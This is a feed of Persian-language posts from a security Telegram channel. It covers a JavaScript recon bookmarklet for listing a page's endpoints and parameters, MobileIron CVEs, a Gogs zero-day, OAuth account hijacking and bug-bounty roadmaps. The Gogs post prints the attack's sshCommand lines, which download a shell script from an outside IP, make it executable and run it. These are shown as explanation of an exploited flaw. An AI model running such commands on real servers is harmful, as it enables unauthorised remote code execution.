کد برای چک کردن پارامترها و فایل های js زیاده
این ui خوبی داره خوشم اومد
این ui خوبی داره خوشم اومد
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g,jsRegex=/(?<=(\"|\'|\%60))(?:\/|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'%60]*)?(?=(\"|\'|\%60))/g;const results=new Set;const paramMap=new Map();const jsFiles=new Set();function processContent(t,src){var e=t.matchAll(regex);for(let r of e){results.add(r[0]);var params=r[0].split('?')[1];if(params){params.split('&').forEach(param=>{var [key,]=param.split('=');if(key){if(!paramMap.has(key)){paramMap.set(key,[]);}paramMap.get(key).push(src||'Inline script or HTML');}});}}var j=t.matchAll(jsRegex);for(let r of j){jsFiles.add(r[0]);}}for(var i=0;i<scripts.length;i++){var t=scripts[i].src;if(t){jsFiles.add(t);fetch(t).then(function(t){return t.text()}).then(text=>processContent(text,t)).catch(function(t){console.log("An error occurred: ",t)});}else{processContent(scripts[i].textContent);}}var pageContent=document.documentElement.outerHTML;processContent(pageContent,'Page content');function writeResults(){var div=document.createElement("div");div.style.cssText="position:fixed;top:0;left:0;width:100%;height:100%;background:#f0f8ff;color:#333;overflow:auto;z-index:9999;padding:20px;font-family:Arial,sans-serif;";var content="<h2 style='color:#4a69bd;'>Endpoints Found: " + results.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";content+=Array.from(results).map(endpoint=>{var fullUrl=endpoint.startsWith("http")?endpoint:window.location.origin+endpoint;return "<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + endpoint + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + fullUrl + "</a></div>"}).join("");content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>Parameters Found:</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";paramMap.forEach((sources,param)=>{content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + param + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + sources.join('<br>') + "</div>";});content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>JS Files Found: " + jsFiles.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr;gap:10px;'>";jsFiles.forEach(file=>{var fullUrl=file.startsWith("http")?file:window.location.origin+file;content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + file + "</a></div>";});content+="</div>";div.innerHTML=content;var closeBtn=document.createElement("button");closeBtn.textContent="Close";closeBtn.style.cssText="position:fixed;top:10px;right:10px;background:#4a69bd;color:white;border:none;padding:10px 20px;cursor:pointer;";closeBtn.onclick=function(){document.body.removeChild(div);};div.appendChild(closeBtn);document.body.appendChild(div)}setTimeout(writeResults,3000);})();
❤9🔥4👍1
Forwarded from PentesterLand Academy - Public
در خصوص قرار دادم ماینر و بک دور یک پست کامل گذاشتم
https://www.instagram.com/reel/DSCKRvnjuNR/?igsh=MW1weDNqcjFzbGdweg==
https://www.instagram.com/reel/DSCKRvnjuNR/?igsh=MW1weDNqcjFzbGdweg==
Instagram
@pentesterland
خوشحالی که اسیب پذیری ها جدید رو با چند ساعت فاصله سریع فیکس میکنی و دیگه تهدیدی دنبالت نمیکنه؟ متاسفانه بیشترین تهدید همین طرز فکر است، سریعا راهکاری که تو ویدیو میگم رو دنبال کن که خدای نکرده دسترسی ه.کر روی سیستمت باقی نمانده و اپلیکیشن و بیزینست رو…
خوشحالی که اسیب پذیری ها جدید رو با چند ساعت فاصله سریع فیکس میکنی و دیگه تهدیدی دنبالت نمیکنه؟ متاسفانه بیشترین تهدید همین طرز فکر است، سریعا راهکاری که تو ویدیو میگم رو دنبال کن که خدای نکرده دسترسی ه.کر روی سیستمت باقی نمانده و اپلیکیشن و بیزینست رو…
❤9
Forwarded from #Silence[𝙒𝙀𝘽3]
این توضیحات نیاز بود
@logicalSilence
یکبار برای همیشه دربارهٔ هک توی WEB3 سعی کردم رودمپش و به شکل مختصر به تفاوتش با وب اپ هکینگ بپردازم
@logicalSilence
❤7🤣4👍1
👍6
❤14
ریپیتر توی کروم رو اگه نصب نکردید
این لینک اکستنشنش
https://chromewebstore.google.com/detail/rep+/dhildnnjbegaggknfkagdpnballiepfm
این لینک اکستنشنش
https://chromewebstore.google.com/detail/rep+/dhildnnjbegaggknfkagdpnballiepfm
❤11
MobileIron
یک پلتفرم برای مدیریت دستگاه های تلفن همراه برای سازمان هاست
ویژگیهای کلیدی MobileIron:
▫️Unified Endpoint Management (UEM)
▫️Zero Trust Security
▫️Mobile Threat Defense (MTD)
▫️Cross-Platform Management (iOS, Android, Windows, macOS)
▫️Containerization (Data Separation)
▫️Identity and Access Management (IAM)
▫️Automated Compliance and Remediation
▫️Per-App Secure VPN
▫️Comprehensive Reporting and Admin Dashboard
لیستی از مهمترین آسیبپذیریهای MobileIron:
▫️CVE-2023-35082: Remote Unauthenticated API Access Vulnerability (Score: 10.0)
▫️CVE-2023-35078: Remote Unauthenticated API Access Vulnerability / Authentication Bypass (Score: 9.8)
▫️CVE-2023-38035: API Authentication Bypass on Sentry Administrator Interface (Score: 9.8)
▫️CVE-2020-15505: Remote Code Execution (RCE) via Unspecified Vectors (Score: 9.8)
▫️CVE-2020-15506: Authentication Bypass (Score: 9.8)
▫️CVE-2020-15507: Arbitrary File Reading (Score: 7.5)
▫️CVE-2021-3540: Escaping Restricted Shell / Privilege Escalation (Score: N/A publicly listed, but impacts privilege)
#Service_hunting
@hackhaven_new
یک پلتفرم برای مدیریت دستگاه های تلفن همراه برای سازمان هاست
ویژگیهای کلیدی MobileIron:
▫️Unified Endpoint Management (UEM)
▫️Zero Trust Security
▫️Mobile Threat Defense (MTD)
▫️Cross-Platform Management (iOS, Android, Windows, macOS)
▫️Containerization (Data Separation)
▫️Identity and Access Management (IAM)
▫️Automated Compliance and Remediation
▫️Per-App Secure VPN
▫️Comprehensive Reporting and Admin Dashboard
لیستی از مهمترین آسیبپذیریهای MobileIron:
▫️CVE-2023-35082: Remote Unauthenticated API Access Vulnerability (Score: 10.0)
▫️CVE-2023-35078: Remote Unauthenticated API Access Vulnerability / Authentication Bypass (Score: 9.8)
▫️CVE-2023-38035: API Authentication Bypass on Sentry Administrator Interface (Score: 9.8)
▫️CVE-2020-15505: Remote Code Execution (RCE) via Unspecified Vectors (Score: 9.8)
▫️CVE-2020-15506: Authentication Bypass (Score: 9.8)
▫️CVE-2020-15507: Arbitrary File Reading (Score: 7.5)
▫️CVE-2021-3540: Escaping Restricted Shell / Privilege Escalation (Score: N/A publicly listed, but impacts privilege)
#Service_hunting
@hackhaven_new
❤7👍1
یدونه zero day برای Gogs اومده که خیلی بحاله
بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده
نیاز به یک یوزر عادی داره و No authentication نیست.
https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده
نیاز به یک یوزر عادی داره و No authentication نیست.
https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
wiz.io
Gogs Zero-Day RCE (CVE-2025-8110) Actively Exploited | Wiz Blog
Wiz Research discovered a Gogs zero-day (CVE-2025-8110) that bypasses a previous RCE fix via symlinks, leading to file overwrite and remote code execution.
❤6
Hack Haven
یدونه zero day برای Gogs اومده که خیلی بحاله بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده نیاز به یک یوزر عادی داره و No authentication نیست. https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
exploit
-دانلود فایل اتکر:
بجای اینکه به گیت وصل شه فایل رو دانلود میکنه
executable کردن فایل-
– اجرای شل
@hackhaven_new
-دانلود فایل اتکر:
sshCommand = wget https://106.53.108.81/123.sh -O /tmp/123.sh
بجای اینکه به گیت وصل شه فایل رو دانلود میکنه
executable کردن فایل-
sshCommand = chmod +x /tmp/123.sh
– اجرای شل
sshCommand = bash /tmp/123.sh
@hackhaven_new
❤5
Forwarded from PentesterLand Academy - Public
این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح کن ❤️🔥
فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه
https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np
نظرت رو راجب این پست باهام مطرح کن ❤️🔥
فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه
https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np
Instagram
@pentesterland
این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح…
نظرت رو راجب این پست باهام مطرح…
❤11👎1
Account hijacking using “dirty dancing” in sign-in OAuth-flows: https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/
Labs Detectify
Account hijacking using "dirty dancing" in sign-in OAuth-flows
Combining response-type switching, invalid state and redirect-uri quirks using OAuth, with third-party javascript-inclusions has multiple vulnerable scenarios where authorization codes or tokens could leak to an attacker. This could be used in attacks for…
❤5
یوتیوب درآمد یوتیوبرای فارسی رو شدیدا کم کرده.
۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم.
خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.
۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم.
خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.
🤣23
Hack Haven
یوتیوب درآمد یوتیوبرای فارسی رو شدیدا کم کرده. ۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم. خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.
This media is not supported in your browser
VIEW IN TELEGRAM
😁3🍓2